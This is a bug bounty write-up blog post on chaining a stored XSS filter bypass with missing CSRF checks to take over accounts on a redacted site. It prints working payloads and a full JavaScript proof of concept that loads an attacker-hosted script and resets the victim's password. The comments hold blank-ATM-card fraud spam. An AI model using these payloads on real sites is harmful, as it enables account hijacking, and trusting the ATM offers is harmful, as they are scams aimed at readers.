XSS + CSRF = Bhoom!

Hello :D Everyone,

It had been a long time since I got a good bug and a bounty too :3 so after an OWASP meet where I met many leet bounty hunters I felt so much motivated, to do a bug hunt.I started poking around and all , so this is a story of a simple Full Account Takeover on a h1 private site

Reported To****************
TypesCross-Site Request Forgery (CSRF),Cross-Site Scripting (XSS)
1. Stored XSS(Required Interaction)
 I found a XSS on its main domain in Website field of user's Profile.I tried javascript:alert(1) to check if javascript could be executed but saw that it was detected as invalid so I tried to to modify the payload to use it like javascript://http://google.com/?aaaa%0aalert(1) and it worked!.For those who don't know.

javascript:                        - Javascript's pseduo protocol/schema
//                                       - Begins a single line comment in js
https://google.com/?aaaa - comment itself
%0a                                  - Intiate a new line which ends the single line comment
alert(1)                             - a valid javascript's predefined function

so It got updated on my profile. But it required Victim to click on Attacker's website by sending him the Attacker's profile page which was publicly accessible so thats how i got a simple XSS with easy bypass. Now I decided to go further before reporting and I played around a little more and I Found that in "Change Password" functionality , they don't ask for the user's old password.Well that was pretty awesome to exploit :D with the XSS we found.


2.CSRF Bypass
 Even though i had a XSS I decided to check if an anti-CSRF token was there(which was not a need since we can grab the token with XSS using xhr). I thought if we could check if CSRF token is being validated on the server side so all I did was , removed the authenticity_token parameter from the form :D and boom! it got updated without it.

#.Full Account TakeOver
so Combining XSS and no confirmation check on user's old password. I Created a POC Which takeover the victim's account by just a click on Attacker's profile's Website. All We need is the victim should be logged into his account.

Earlier while Changing the password I saw that the form was submitted to an endpoint which had a unique user id which was not publicly known
https://www.******.com/users/{UNIQUE ID}
so we just needed to grab userid and since the csrf token is not validated we don't need to grab that.

So I made XHR Request to  /account (various other end points also contained user_id in their source) to find the user_id(victim's) and grabbed that and submitted the Password Change form with that user_id







I hosted this javascript on a https domain.
var user_id;
var http=new XMLHttpRequest;
http.open("GET","https://www.*******.com/account",true);
http.send();
http.onload=function()
{
    if(http.status===200)
    {
        var html=http.responseText;
        var parser=new DOMParser;
        var dom=parser.parseFromString(html,'text/html');
      
           user_id=(dom.getElementsByClassName('edit_user')[0].id).split('_')[2];

      
    }
};
alert(user_id);
var f=document.createElement('form');
var i1=document.createElement('input');
var i2=document.createElement('input');
var i3=document.createElement('input');
var i4=document.createElement('input');
var i5=document.createElement('input');
f.action="https://www.********.com/users/"+user_id;
f.class="edit_user";
f.id="edit_user_"+user_id;
f.method="POST";
i1.name="utf8";
i1.type="hidden";
i1.value="✓";
i2.name="_method";
i2.type="hidden";
i2.value="put";
i3.id="page";
i3.name="page";
i3.type="hidden";
i3.value="password";
i4.id="user_password"
i4.name="user[password]"
i4.value="my1337pass";
i4.type="password";
i5.class="button";
i5.name="commit";
i5.type="submit";
f.appendChild(i1);
f.appendChild(i2);
f.appendChild(i3);
f.appendChild(i4);
f.appendChild(i5);
f.submit();

and entered
 javascript://http://google.com.?a%0avar x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);
in the website url and updated my(attacker's) profile.



Now all victim had to do was , to click on attacker's website and BOOM! his password got changed to 'my1337pass'.


I got a fair enough bounty :D.

Thanks to every awesome infosec people who share their knowledge.

10 comments:

  1. bug bounty gawd, h1 private site

    ReplyDelete
    Replies
    1. INSTEAD OF GETTING A LOAN, CHECK OUT THE BLANK ATM CARD IN LESS THAN 24hours {blankatmhaker@gmail.com}

      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: blankatmhaker@gmail.com or call/Text on +1(406) 350-4986

      Delete
    2. This comment has been removed by the author.

      Delete
  2. Amazing poC dude! thanks for sharing!

    https://twitter.com/knowledge_2014

    best regards
    ak1t4

    ReplyDelete
  3. I am having confused javascript://http://google.com/?aaaa%0aalert(1)
    this payload still runs and worked for many doamin whats this

    ReplyDelete

  4. شركة تنظيف فلل بالمدينة المنورة المنورة 0542742095 -0509178637
    | المدينة المنورة
    شركة تنظيف فلل بالمدينة المنورة

    يمكن الآن القيام بعملية التنظيف للفلل بغاية في السهولة الفلل معروفة بمساحتها الكبيرة وطوابقها المتعددة ولا يمكن لأصحابها أن يقوموا بعملية التنظيف كتنظيف وغسيل السجاد الموجود بها وأيضا الموكيت الذي يغطي معظم أرضيات المكان وأيضا تنظيف موقف السيارات الموجود بها والحديقة ولكن من خلال شركة تنظيف فلل بالمدينة المنورة يتم توفير العديد من الخدمات ويمكن طلبها مرة واحدة أو كل خدمة على حدى ومن ضمن تلك الخدمات لو كنت تريد تنظيف الممشى الخارجي للفلل فيمكن الاتصال وطلب خدمة جلى الأرضيات وأيضا يوجد لدينا خدمة تنظيف واجهات الفلل بأحدث الطرق حيث يتم استخدام مواد تقوم بالحفاظ على ألوان البياض وحمايته من العوامل الجوية كالأمطار والأتربة من الرياح الموسمية وأيضا خدمة تنظيف كنب وموكيت وستائر
    http://www.elmadinaelmonawara.com/%D8%B4%D8%B1%D9%83%D8%A9-%D8%AA%D9%86%D8%B8%D9%8A%D9%81-%D9%81%D9%84%D9%84-%D8%A8%D8%A7%D9%84%D9%85%D8%AF%D9%8A%D9%86%D8%A9-%D8%A7%D9%84%D9%85%D9%86%D9%88%D8%B1%D8%A9/

    للتواصل معانا
    0542742095 -0509178637

    او زيارة موقعنا
    http://www.elmadinaelmonawara.com
    كما نقدم اليكم المزيد من الخدمات
    شركة تنظيف منازل بالمدينة المنورة

    شركة تنظيف شقق بالمدينة المنورة

    شركة تنظيف عمائر بالمدينة المنورة
    شركة تنظيف بالمدينة المنورة

    ReplyDelete
    Replies
    1. INSTEAD OF GETTING A LOAN, CHECK OUT THE BLANK ATM CARD IN LESS THAN 24hours {blankatmhaker@gmail.com}

      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: blankatmhaker@gmail.com or call/Text on +1(406) 350-4986

      Delete
  5. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (hydracards63@gmail.com) for how to get it and it cost,and how to also hack credit cards and send the money to your self,we are located around the world, these cards works on any ATM machine and it works according to it's activation.

    ………. EXPLANATION OF HOW THESE CARD WORKS……….

    You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT #1,000, 2nd VAULT #5,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done.

    ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. To get the card email (hydracards63@gmail.com)

    ReplyDelete

Powered by Blogger.